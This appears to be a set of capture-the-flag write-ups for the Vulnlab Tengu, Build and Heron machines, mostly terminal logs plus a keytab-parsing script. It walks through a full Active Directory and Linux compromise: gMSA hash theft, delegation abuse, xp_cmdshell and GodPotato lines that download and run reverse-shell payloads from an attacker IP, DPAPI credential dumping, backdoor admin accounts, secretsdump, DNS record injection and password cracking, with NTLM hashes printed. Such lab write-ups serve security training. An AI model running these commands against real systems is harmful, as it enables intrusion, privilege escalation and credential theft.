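    ("TENGU.VL", ["NODERED$"], 18, bytes(range(32)), 3, 1723200000),
    ("TENGU.VL", ["host", "nodered.tengu.vl"], 23, bytes(range(16, 32)), 3, 1723200000),
])

if __name__ == "__main__":
    for entry in parse_keytab(SAMPLE_KEYTAB):
        print(entry)
    print(ntlm_hashes(parse_keytab(SAMPLE_KEYTAB)))
```

The kvno matters in practice: if the machine account password has rotated since the keytab was written, the keys are stale and the NT hash will simply fail to authenticate, so compare the kvno against what the DC reports before assuming the file is wrong.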
.
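A defender-side view of what a keytab exposes, added here as an example (this is not KeyTabExtract's code): it parses the MIT keytab format, lists each principal's key entries and flags RC4-HMAC keys, which are what makes the NTLM extraction above possible, without printing any key bytes. The sample keytab is constructed inline with dummy zero keys; only the current version-2 layout is handled.

```python
"""Inventory the principals and encryption types in an MIT krb5.keytab.

Added example for this write-up, not part of KeyTabExtract. RC4-HMAC (etype 23)
keys are NTLM-equivalent, so their presence in a host keytab is what a
defender should look for. Key material is read past, never kept or printed.
"""
import struct

# Kerberos encryption type numbers (RFC 3961/3962, RFC 4757).
ENCTYPE_NAMES = {
    1: "des-cbc-crc",
    3: "des-cbc-md5",
    16: "des3-cbc-sha1",
    17: "aes128-cts-hmac-sha1-96",
    18: "aes256-cts-hmac-sha1-96",
    23: "rc4-hmac",
}
WEAK_ENCTYPES = {1, 3, 16, 23}


def _read_counted(buf, pos):
    """Read a big-endian uint16 length followed by that many bytes."""
    (length,) = struct.unpack_from(">H", buf, pos)
    pos += 2
    return buf[pos:pos + length], pos + length


def parse_keytab(data):
    """Return one dict per key entry: realm, principal, name_type, timestamp, kvno, enctype.

    Layout: 2 version bytes (0x0502), then records each prefixed by an int32
    size; a negative size marks a deleted slot whose payload is skipped.
    """
    if data[:2] != b"\x05\x02":
        raise ValueError("unsupported keytab version (expected 0x0502)")
    entries, pos = [], 2
    while pos + 4 <= len(data):
        (size,) = struct.unpack_from(">i", data, pos)
        pos += 4
        if size == 0:
            break
        if size < 0:               # deleted slot: skip its payload
            pos += -size
            continue
        end = pos + size
        if end > len(data):
            raise ValueError("truncated keytab entry")
        (num_components,) = struct.unpack_from(">H", data, pos)
        pos += 2
        realm, pos = _read_counted(data, pos)
        components = []
        for _ in range(num_components):
            comp, pos = _read_counted(data, pos)
            components.append(comp.decode("utf-8", "replace"))
        name_type, timestamp, vno8 = struct.unpack_from(">IIB", data, pos)
        pos += 9
        (enctype,) = struct.unpack_from(">H", data, pos)
        pos += 2
        _key, pos = _read_counted(data, pos)   # key bytes: skipped, never stored
        kvno = vno8
        if end - pos >= 4:                     # optional 32-bit kvno wins when non-zero
            (kvno32,) = struct.unpack_from(">I", data, pos)
            if kvno32:
                kvno = kvno32
        pos = end
        entries.append({"realm": realm.decode("utf-8", "replace"),
                        "principal": "/".join(components), "name_type": name_type,
                        "timestamp": timestamp, "kvno": kvno, "enctype": enctype})
    return entries


def weak_key_report(entries):
    """Return (principal@REALM, enctype name) for every key with a weak enctype."""
    return [(f"{e['principal']}@{e['realm']}", ENCTYPE_NAMES.get(e["enctype"], str(e["enctype"])))
            for e in entries if e["enctype"] in WEAK_ENCTYPES]


def build_keytab(realm, components, keys, kvno=2, timestamp=0):
    """Build a version-2 keytab with one record per (enctype, key); constructed test data only."""
    out = bytearray(b"\x05\x02")
    for enctype, key in keys:
        body = bytearray(struct.pack(">H", len(components)))
        body += struct.pack(">H", len(realm)) + realm.encode()
        for c in components:
            body += struct.pack(">H", len(c)) + c.encode()
        body += struct.pack(">IIB", 1, timestamp, kvno & 0xFF)   # name_type 1 = KRB5_NT_PRINCIPAL
        body += struct.pack(">HH", enctype, len(key)) + key
        body += struct.pack(">I", kvno)
        out += struct.pack(">i", len(body)) + body
    return bytes(out)


if __name__ == "__main__":
    # Constructed sample shaped like the NODERED$ host keytab above; keys are dummy zero bytes.
    sample = build_keytab("TENGU.VL", ["NODERED$"],
                          [(23, b"\x00" * 16), (18, b"\x00" * 32), (17, b"\x00" * 16)])
    for e in parse_keytab(sample):
        print(f"{e['principal']}@{e['realm']} kvno={e['kvno']} "
              f"etype={ENCTYPE_NAMES.get(e['enctype'], e['enctype'])}")
    for who, etype in weak_key_report(parse_keytab(sample)):
        print(f"WEAK: {who} has a {etype} key")
```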
proxychains4 bloodhound-python -d tengu.vl -c all -u t2_m.winters -p Tengu123 -ns 10.10.219.229 --dns-tcp --zip
In BloodHound we find that the machine account NODERED$ has the ReadGMSAPassword permission.
We can use netexec to retrieve the NTLM hash for the account gMSA01$:
┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 netexec ldap dc.tengu.vl -u 'NODERED$' -H d4210ee2db0c03aa3611c9ef8a4dbf49 --gmsa
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:636 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:445 ... OK
SMB         224.0.0.1       445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tengu.vl) (signing:True) (SMBv1:False)
[proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:636 ... OK
LDAPS       224.0.0.1       636    DC               [+] tengu.vl\NODERED$:d4210ee2db0c03aa3611c9ef8a4dbf49
LDAPS       224.0.0.1       636    DC               [*] Getting GMSA Passwords
LDAPS       224.0.0.1       636    DC               Account: gMSA01$              NTLM: d4b65861e85773fba2035b31ebcacb37
LDAPS       224.0.0.1       636    DC               Account: gMSA02$              NTLM:
We notice that this account is allowed to delegate:
┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 -q impacket-findDelegation 'tengu.vl/nodered$:@dc.tengu.vl' -hashes :d4210ee2db0c03aa3611c9ef8a4dbf49
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

AccountName  AccountType                          DelegationType                      DelegationRightsTo
-----------  -----------------------------------  ----------------------------------  --------------------------
gMSA01$      ms-DS-Group-Managed-Service-Account  Constrained w/ Protocol Transition  MSSQLSvc/SQL:1433
gMSA01$      ms-DS-Group-Managed-Service-Account  Constrained w/ Protocol Transition  MSSQLSvc/sql.tengu.vl:1433
gMSA01$      ms-DS-Group-Managed-Service-Account  Constrained w/ Protocol Transition  MSSQLSvc/sql.tengu.vl
gMSA01$      ms-DS-Group-Managed-Service-Account  Constrained w/ Protocol Transition  MSSQLSvc/sql
In BloodHound we find a SQL_Admins group containing two users; next we try to impersonate one of them.
Getting the ticket:
┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 impacket-getST -spn 'MSSQLSvc/sql.tengu.vl' 'tengu.vl/GMSA01$@sql.tengu.vl' -hashes :d4b65861e85773fba2035b31ebcacb37 -dc-ip 10.10.185.21 -impersonate 't1_m.winters'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.185.21:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.185.21:88 ... OK
[*] Impersonating t1_m.winters
[*] Requesting S4U2self
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.185.21:88 ... OK
[*] Requesting S4U2Proxy
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.185.21:88 ... OK
[*] Saving ticket in t1_m.winters@MSSQLSvc_sql.tengu.vl@TENGU.VL.ccache
export KRB5CCNAME=t1_m.winters@MSSQLSvc_sql.tengu.vl@TENGU.VL.ccache
┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 -q impacket-mssqlclient -k sql.tengu.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL): Line 1: Changed database context to 'master'.
[*] INFO(SQL): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (TENGU\t1_m.winters  dbo@master)>
SQL (TENGU\t1_m.winters dbo@master)> xp_cmdshell powershell "cd ..\..; mkdir temp; cd C:\temp; certutil.exe -urlcache -f http://10.8.2.138/rcat_10.8.2.138_443.exe rcat_10.8.2.138_443.exe; .\rcat_10.8.2.138_443.exe"
Catch the shell
┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.185.22] 57071
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
PS C:\temp>
GodPotato on SQL:
PS C:\temp> ./god.exe -cmd "powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138:8080/rev.ps1');"
./god.exe -cmd "powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138:8080/rev.ps1');"
[*] CombaseModule: 0x140723188531200
[*] DispatchTable: 0x140723191118152
[*] UseProtseqFunction: 0x140723190413536
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\1d5f2595-2789-449b-affd-92979c14b4c6\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000b802-095c-ffff-21e6-2d89c9d2f435
[*] DCOM obj OXID: 0x3beb0139e85dbe21
[*] DCOM obj OID: 0x3a821b5f15430353
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 908 Token:0x764  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3888
Catch the shell as NT AUTHORITY\SYSTEM and add ourselves as local admin on SQL,
after first finding the credentials of the domain admin TENGU\T0_c.fowler.
Users may choose to save passwords in Windows by using an application or through the Credential Manager Control Panel applet. These credentials are stored on the hard disk drive and protected by using the Data Protection Application Programming Interface (DPAPI). Any program running as that user will be able to access credentials in this store.
PS C:\temp> wget http://10.8.2.138/sharp.exe -o sharp.exe
PS C:\temp> ./sharp.exe machinetriage /showall

  SharpDPAPI v1.11.3

[*] Action: Machine DPAPI Credential, Vault, and Certificate Triage

[*] Secret  : DPAPI_SYSTEM
[*]    full: C9C2333305555B68C729FD0938EE5DB5D2C8B33540B36F0AC59918C608686152CB7F09F74A22F544
[*]    m/u : C9C2333305555B68C729FD0938EE5DB5D2C8B335 / 40B36F0AC59918C608686152CB7F09F74A22F544

[*] SYSTEM master key cache:
{474602b3-bbd6-4a0e-9c1d-52aa0cb0a039}:BE80161FB9DADBFBF9620483D8BC4EF0BDB4B6F5
{7710e63f-a791-438b-8dfa-33f25aef47a8}:6466F58B69E7B437DBCC89D4CAEFEF7E84944CE7
{1415bc56-749a-4f03-8a8e-9fb9733359ab}:FBED03CA71C0CACACF43D8EB3F6D03ADB9C3198B
{236fb638-82cd-4a22-b9e7-6745744da5bd}:CD9A01A3056FC877EE9B343AC3BE584AB7DF4D86

[*] Triaging System Credentials

Folder       : C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials

  CredFile           : 67B6C9FA0475C51A637428875C335AAD
    guidMasterKey    : {1415bc56-749a-4f03-8a8e-9fb9733359ab}
    size             : 576
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      : Local Credential Data
    LastWritten      : 3/10/2024 2:49:34 PM
    TargetName       : Domain:batch=TaskScheduler:Task:{3C0BC8C6-D88D-450C-803D-6A412D858CF2}
    TargetAlias      :
    Comment          :
    UserName         : TENGU\T0_c.fowler
    Credential       : Unt<redacted>y25
PS C:\temp> net user puck Password123! /add
The command completed successfully.

PS C:\temp> net user

User accounts for \\
-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
puck                     WDAGUtilityAccount
The command completed with one or more errors.

PS C:\temp> net localgroup administrators puck /add
The command completed successfully.
Next, RDP to SQL as puck:
proxychains xfreerdp /u:puck /p:'Password123!' /w:1566 /h:968 /v:10.10.141.134:3389
From there, start Active Directory Users and Computers as that user and add puck as a Domain Admin, then mstsc to dc.tengu.vl.
Finally, do a hashdump:
proxychains4 impacket-secretsdump 'tengu/puck:Password123!@dc.tengu.vl' > allhashes.txt
Because all Domain Admins are members of the group PROTECTED USERS@TENGU.VL, we can't RDP in.
That was super fun
vulnlab-build
an easy Linux box
rsync enum
└─$ rsync -av --list-only rsync://10.10.94.243
backups        backups
└─$ rsync -r rsync://10.10.94.243::backups
Decrypting the Jenkins password:
┌──(puck㉿kali)-[~/vulnlab/build/jenkins_configuration/secrets]
└─$ python3 ../../decrypt.py master.key hudson.util.Secret ../jobs/build/config.xml
Git<redacted>!
Log in to Gitea as user buildadm and get RCE by editing the Jenkinsfile.
Start a netcat listener to catch the shell
┌──(puck㉿kali)-[~/vulnlab/build]
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.94.243] 38892
sh: 0: can't access tty; job control turned off
# pwd
/var/jenkins_home/workspace/build_dev_main
# cd /root
# ls
user.txt
# cat user.txt
VL{bf<redacted>c2}
Run the chisel server:
┌──(puck㉿kali)-[~/vulnlab/build]
└─$ chisel server -p 8000 --reverse
2024/08/09 10:26:20 server: Reverse tunnelling enabled
2024/08/09 10:26:20 server: Fingerprint pcPwgUx5V0JZX07cMUWbhSsjiQijd+PWFISAgaIp+vE=
2024/08/09 10:26:20 server: Listening on http://0.0.0.0:8000
2024/08/09 10:28:31 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
From the Docker container:
# pwd
/root/.ssh
# wget http://10.8.2.138/chisel
sh: 24: wget: not found
# curl http://10.8.2.138/chisel -o chisel
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 8506k  100 8506k    0     0  8620k      0 --:--:-- --:--:-- --:--:-- 8618k
# chmod +x chisel
# ls -la
total 8528
drwxr-xr-x 3 root root    4096 Aug  9 08:25 .
drwxr-xr-x 1 root root    4096 May  9 18:50 ..
lrwxrwxrwx 1 root root       9 May  1 14:37 .bash_history -> /dev/null
-r-------- 1 root root      35 May  1 17:37 .rhosts
drwxr-xr-x 2 root root    4096 May  1 16:05 .ssh
-rwxr-xr-x 1 root root 8711104 Aug  9 08:25 chisel
-rw------- 1 root root      37 May  1 14:29 user.txt
# ./chisel client 10.8.2.138:8000 R:socks
2024/08/09 08:28:30 client: Connecting to ws://10.8.2.138:8000
2024/08/09 08:28:30 client: Connected (Latency 20.395643ms)
nmap the host
┌──(puck㉿kali)-[~/vulnlab/build]
└─$ proxychains -q nmap 172.18.0.1
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-09 10:29 CEST
Stats: 0:00:14 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 24.50% done; ETC: 10:30 (0:00:46 remaining)
Stats: 0:00:36 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 62.10% done; ETC: 10:30 (0:00:23 remaining)
Nmap scan report for 172.18.0.1
Host is up (0.059s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
873/tcp  open  rsync
3000/tcp open  ppp
3306/tcp open  mysql
8081/tcp open  blackice-icecap

Nmap done: 1 IP address (1 host up) scanned in 59.51 seconds
Connect to MySQL:
┌──(puck㉿kali)-[~/vulnlab/build]
└─$ proxychains mysql -h 172.18.0.1 -u root
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.18.0.1:3306 ... OK
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 34
Server version: 11.3.2-MariaDB-1:11.3.2+maria~ubu2204 mariadb.org binary distribution

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| powerdnsadmin      |
| sys                |
+--------------------+
5 rows in set (0.025 sec)

MariaDB [(none)]> use powerdnsadmin;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [powerdnsadmin]> select * from user;
+----+----------+-------------------------------------+-----------+----------+----------------+------------+---------+-----------+
| id | username | password                            | firstname | lastname | email          | otp_secret | role_id | confirmed |
+----+----------+-------------------------------------+-----------+----------+----------------+------------+---------+-----------+
|  1 | admin    | $2b$12$s1hK<redacted>Ze3Uw5Sc2.hsEq | admin     | admin    | admin@build.vl | NULL       |       1 |         0 |
+----+----------+-------------------------------------+-----------+----------+----------------+------------+---------+-----------+
1 row in set (0.023 sec)

MariaDB [powerdnsadmin]> select * from records;
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
| id | domain_id | name                 | type | content                                                                                  | ttl  | prio | disabled | ordername | auth |
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
|  8 |         1 | db.build.vl          | A    | 172.18.0.4                                                                               |   60 |    0 |        0 | NULL      |    1 |
|  9 |         1 | gitea.build.vl       | A    | 172.18.0.2                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 10 |         1 | intern.build.vl      | A    | 172.18.0.1                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 11 |         1 | jenkins.build.vl     | A    | 172.18.0.3                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 12 |         1 | pdns-worker.build.vl | A    | 172.18.0.5                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 13 |         1 | pdns.build.vl        | A    | 172.18.0.6                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 14 |         1 | build.vl             | SOA  | a.misconfigured.dns.server.invalid hostmaster.build.vl 2024050201 10800 3600 604800 3600 | 1500 |    0 |        0 | NULL      |    1 |
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
7 rows in set (0.022 sec)

MariaDB [powerdnsadmin]> INSERT INTO records (id, domain_id, name, type, content, ttl, prio, disabled, ordername, auth)
    -> VALUES (7, 1, 'admin.build.vl', 'A', '10.8.2.138', 60, 0, 0, NULL,1);
Query OK, 1 row affected (0.023 sec)

MariaDB [powerdnsadmin]>
┌──(puck㉿kali)-[~/vulnlab/build]
└─$ john admin.hash
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 4096 for all loaded hashes
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Proceeding with wordlist:/usr/share/john/password.lst
wi<redacted>on       (?)
1g 0:00:00:17 DONE 2/3 (2024-08-09 10:36) 0.05688g/s 40.95p/s 40.95c/s 40.95C/s roman..xavier
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Install rsh client on kali box
┌──(puck㉿kali)-[~/vulnlab/build]
└─$ sudo apt-get install rsh-redone-client
rsh to build.vl machine as root
┌──(puck㉿kali)-[~/vulnlab/build]
└─$ rsh -l root 10.10.94.243
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-105-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

  System information as of Fri Aug  9 08:42:41 AM UTC 2024

  System load:                      0.64306640625
  Usage of /:                       62.7% of 9.75GB
  Memory usage:                     60%
  Swap usage:                       0%
  Processes:                        144
  Users logged in:                  0
  IPv4 address for br-f8002c9d7234: 172.18.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for ens5:            10.10.94.243

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

root@build:~# pwd
/root
root@build:~# cat root.txt
VL{fe<redacted>b2}
root@build:~#
That was fun.
vulnlab-heron
a medium chain
We find a note online with the initial password to connect to the Linux box: pentest:Heron123!
We start chisel on our kali box
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ chisel server -p 8000 --reverse
2024/08/02 14:29:11 server: Reverse tunnelling enabled
2024/08/02 14:29:11 server: Fingerprint eyu7C2ldEm70kbrgTg7RsaykP56cSgqwu7GXCH17JyM=
2024/08/02 14:29:11 server: Listening on http://0.0.0.0:8000
2024/08/02 14:30:12 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ ssh pentest@10.10.148.86
The authenticity of host '10.10.148.86 (10.10.148.86)' can't be established.
ED25519 key fingerprint is SHA256:7vUA9tMchnLRfzMzAtJD+Hwwr0nppIBRhctvevOQbm0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.148.86' (ED25519) to the list of known hosts.
****************************************************
*               Welcome to Heron Corp              *
*  Unauthorized access to 'frajmp.heron.vl' is     *
*  forbidden and will be prosecuted by law.        *
****************************************************
(pentest@10.10.148.86) Password:
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-107-generic x86_64)

  System information as of Fri Aug  2 12:24:16 PM UTC 2024

  System load:  0.0               Processes:             110
  Usage of /:   44.8% of 9.75GB   Users logged in:       0
  Memory usage: 23%               IPv4 address for ens5: 10.10.148.86
  Swap usage:   0%

Last login: Fri Jun  7 10:34:38 2024 from 10.8.0.101
pentest@frajmp:~$ who
pentest  pts/0        2024-08-02 12:24 (10.8.2.138)
pentest@frajmp:~$ cd /tmp
pentest@frajmp:/tmp$ wget http://10.8.2.138/chisel
--2024-08-02 12:28:23--  http://10.8.2.138/chisel
Connecting to 10.8.2.138:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8711104 (8.3M) [application/octet-stream]
Saving to: ‘chisel’

chisel              100%[=======================>]   8.31M  6.88MB/s    in 1.2s

2024-08-02 12:28:25 (6.88 MB/s) - ‘chisel’ saved [8711104/8711104]

pentest@frajmp:/tmp$ chmod +x chisel
pentest@frajmp:/tmp$ ./chisel client 10.8.2.138:8000 R:socks
2024/08/02 12:30:11 client: Connecting to ws://10.8.2.138:8000
2024/08/02 12:30:12 client: Connected (Latency 20.482852ms)
We do a slow nmap scan over proxychains to the DC
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains nmap -sC -sV -oN herondc.nmap -p 80,445,389,53,135,3389,443,21 10.10.148.85
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-02 14:47 CEST
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:53 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:3389 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:443 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:21 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:389 ... OK
Nmap scan report for 10.10.148.85
Host is up (0.062s latency).

PORT     STATE  SERVICE       VERSION
21/tcp   closed ftp
53/tcp   open   domain        Simple DNS Plus
80/tcp   open   http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: Heron Corp
|_http-server-header: Microsoft-IIS/10.0
135/tcp  open   msrpc         Microsoft Windows RPC
389/tcp  open   ldap          Microsoft Windows Active Directory LDAP (Domain: heron.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=mucdc.heron.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:mucdc.heron.vl
| Not valid before: 2024-06-01T15:29:52
|_Not valid after:  2025-06-01T15:29:52
|_ssl-date: TLS randomness does not represent time
443/tcp  closed https
445/tcp  open   microsoft-ds  Windows Server 2022 Standard 20348 microsoft-ds (workgroup: HERON)
3389/tcp open   ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-08-02T12:49:19+00:00; -2s from scanner time.
| rdp-ntlm-info:
|   Target_Name: HERON
|   NetBIOS_Domain_Name: HERON
|   NetBIOS_Computer_Name: MUCDC
|   DNS_Domain_Name: heron.vl
|   DNS_Computer_Name: mucdc.heron.vl
|   DNS_Tree_Name: heron.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-08-02T12:49:08+00:00
| ssl-cert: Subject: commonName=mucdc.heron.vl
| Not valid before: 2024-06-01T10:54:12
|_Not valid after:  2024-12-01T10:54:12
Service Info: Host: MUCDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2024-08-02T12:49:12
|_  start_date: N/A
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
|_clock-skew: mean: 1h23m58s, deviation: 3h07m51s, median: -2s
| smb-os-discovery:
|   OS: Windows Server 2022 Standard 20348 (Windows Server 2022 Standard 6.3)
|   Computer name: mucdc
|   NetBIOS computer name: MUCDC\x00
|   Domain name: heron.vl
|   Forest name: heron.vl
|   FQDN: mucdc.heron.vl
|_  System time: 2024-08-02T05:49:10-07:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.02 seconds
On open port 80 we curl the site and find some usernames:
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 curl http://10.10.148.85
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:80 ... OK
<!DOCTYPE html>
<html lang="en">
<body>
<div class="container mt-5">
<div class="text-center mb-4">
<h1 class="display-4 text-white">Heron Corp</h1>
<p class="lead text-white">Building the future of aerospace with precision and innovation.</p>
<h5 class="card-title">Wayne Wood</h5>
<p class="card-text">CEO</p>
<p>Email: wayne.wood@heron.vl</p>
<h5 class="card-title">Julian Pratt</h5>
<p class="card-text">Head of IT</p>
<p>Email: julian.pratt@heron.vl</p>
<i class="fas fa-user-tie fa-3x mb-3"></i>
<h5 class="card-title">Samuel Davies</h5>
<p class="card-text">Accounting</p>
<p>Email: samuel.davies@heron.vl</p>
</body>
</html>
We add to our /etc/hosts
10.10.148.85 mucdc.heron.vl heron.vl
Check for AS-REP roastable users (AD accounts with the option "Do not require Kerberos preauthentication" set):
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 impacket-GetNPUsers heron.vl/'Guest' -dc-ip 10.10.148.85 -no-pass -request -usersfile users.txt
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
